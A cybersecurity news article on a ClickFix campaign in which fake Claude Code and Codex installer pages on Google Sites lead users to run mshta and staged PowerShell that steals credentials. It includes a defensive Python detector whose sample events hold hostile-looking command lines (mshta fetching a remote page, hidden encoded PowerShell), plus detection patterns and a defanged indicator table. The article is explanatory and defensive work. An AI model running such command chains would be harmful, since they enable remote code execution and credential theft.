
Fake Claude Code Installer Via Google Sites Delivers Credential-Stealing Malware

Cybercriminals have found a new and clever way to exploit the growing popularity of AI developer tools.

A recently identified campaign uses fake pages mimicking Claude Code and OpenAI Codex, hosted on trusted Google Sites infrastructure, to trick users into running commands that quietly steal their credentials and other sensitive personal data from their devices.

The attack follows a technique known as ClickFix, where victims are shown what looks like a legitimate setup page and told to execute a short command.

There is no file downloaded in the traditional sense. Instead, the entire malicious operation runs silently in memory, making it much harder for standard security tools to catch it in the act.

Analysts at ANY.RUN said in a report shared with Cyber Security News (CSN) that they identified this active ClickFix campaign impersonating popular AI tools, including both Codex and Claude.

The researchers noted that because network activity appears as normal PowerShell traffic, the attack can significantly reduce visibility during the earliest stages of a system compromise.

What makes this campaign stand out is how well it blends in. Google Sites pages carry the trust of a legitimate Google domain, and most users would not think twice before following instructions on such a page.

Fake Claude & Codex Deliver In-Memory Stealer: ClickFix via Google Sites
We’re tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure… pic.twitter.com/BeiU03Stua
ANY.RUN (@anyrun_app), June 3, 2026

The combination of a trusted hosting platform, a convincing lure, and a fully in-memory payload gives attackers a meaningful advantage over the people they target.

The impact of such an attack can be severe. Stolen data includes saved browser passwords, email credentials, and cryptocurrency wallet information, all of which are sent to attacker-controlled servers.

Developers and professionals who regularly work with AI coding tools are at particular risk, since they are the most likely to follow command-line installation instructions without hesitation.

Fake Claude Code Installer Via Google Sites

Victims are directed to a Google Sites page designed to look like a legitimate Claude Code or Codex installation guide.

Once there, they are told to run a command through mshta, a built-in Windows utility, to complete the setup process. That single action is all it takes to kick off the entire attack chain.

From there, a multi-stage PowerShell sequence begins running in the background. One of the more technically interesting elements of this campaign is the use of steganography, where the malicious payload is hidden inside an image file and extracted only at runtime.

The extracted shellcode is then executed entirely inside a running PowerShell process, never touching the disk in a way that traditional antivirus tools would flag.

The execution chain moves quickly and quietly: the Google Sites lure leads to the mshta command, which triggers PowerShell staging; the staging code extracts a hidden payload from an image and runs it as shellcode in memory; the shellcode then collects browser data, email credentials, and wallet information and exfiltrates everything to a remote attacker-controlled server.

Steganography and In-Memory Execution

The use of steganography in this campaign reflects a broader shift in how attackers are designing their tools.

By hiding shellcode inside image pixels rather than using standalone executable files, the attackers reduce the number of artifacts left behind on a victim’s machine. Security Operations Center teams are left with very little to investigate after the fact.

Since the malicious process runs inside a legitimate Windows program like PowerShell, network monitoring tools may interpret the outbound traffic as entirely routine activity.

This level of operational camouflage is part of what makes this campaign particularly difficult to defend against without behavioral detection in place.

Security researchers recommend treating any webpage that asks you to copy and paste a command with a high level of suspicion, even if the site looks official.

Users should always verify installation instructions through a tool’s official documentation or its original GitHub repository rather than following prompts from search results or unfamiliar websites.

Organizations should also deploy endpoint detection tools capable of behavioral analysis, which can identify suspicious PowerShell activity even when no traditional malware file is written to disk.
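The behavioral detection recommended here, applied to the mshta-to-PowerShell chain described in the execution-chain section above, as an added Python example that is not code from ANY.RUN or the original report. It runs over constructed Sysmon-style process-creation events; every PID, path, command line and URL in it is made up for the example.

```python
import re

# Constructed Sysmon Event ID 1 style events; PIDs, paths and command lines are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1880, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4412, "ppid": 1880, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://sites.example.invalid/view/fake-installer"},
    {"pid": 4520, "ppid": 4412, "image": PS,
     "cmdline": "powershell -w hidden -ep bypass -enc PLACEHOLDER_BASE64"},
    {"pid": 5200, "ppid": 3000, "image": PS, "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def is_mshta_remote(ev):
    """mshta.exe handed a URL or script protocol handler: the ClickFix entry point."""
    return basename(ev["image"]) == "mshta.exe" and bool(re.search(r"(?i)\b(https?://|javascript:|vbscript:)", ev["cmdline"]))

def is_suspicious_powershell(ev, parent):
    """PowerShell spawned by a script host, or launched encoded, or hidden plus policy bypass."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev["cmdline"]
    hidden = re.search(r"(?i)-(w|win|windowstyle)\s+hidden", cmd)
    encoded = re.search(r"(?i)-(e|ec|enc|encodedcommand)\b", cmd)
    bypass = re.search(r"(?i)-(ep|executionpolicy)\s+bypass", cmd)
    from_lolbin = parent is not None and basename(parent["image"]) in LOLBIN_PARENTS
    return bool(from_lolbin or encoded or (hidden and bypass))

def detect(events):
    """Return (pid, rule) hits; parent lookup assumes the parent event is in the same batch."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = []
    for ev in events:
        if is_mshta_remote(ev):
            hits.append((ev["pid"], "mshta_remote_content"))
        if is_suspicious_powershell(ev, by_pid.get(ev["ppid"])):
            hits.append((ev["pid"], "suspicious_powershell"))
    return hits

def lineage(events, pid):
    """Process ancestry for triage, root first, e.g. explorer.exe > mshta.exe > powershell.exe."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]
```

On the sample batch, `detect` flags the mshta launch and the PowerShell it spawned while leaving the script-file PowerShell run alone, and `lineage` reconstructs the explorer > mshta > powershell ancestry an analyst would pivot on.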

Indicators of Compromise (IoCs):

The source material did not include specific file hashes, IP addresses, or domains in directly extractable form.

However, the ANY.RUN sandbox analysis sessions referenced in the source provide the following trackable artifacts:

Type | Indicator | Description
URL | sites.google[.]com/view/clau-ver-un-24 | Google Sites lure page impersonating the Claude Code installer
URL | app.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645 | ANY.RUN sandbox analysis session for the Claude lure
URL | app.any.run/tasks/151cfb30 | ANY.RUN sandbox analysis session for the Codex lure
Process | mshta.exe | Windows utility abused to initiate the ClickFix attack chain
Process | powershell.exe | Used for multi-stage payload delivery and in-memory shellcode execution
Tactic | ClickFix via Google Sites | Social engineering lure directing victims to execute an mshta command
Data Target | Browser, email, crypto wallets | Categories of credentials stolen and exfiltrated to C2 infrastructure

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.


The post Fake Claude Code Installer Via Google Sites Delivers Credential-Stealing Malware appeared first on Cyber Security News.

Source: cybersecuritynews.com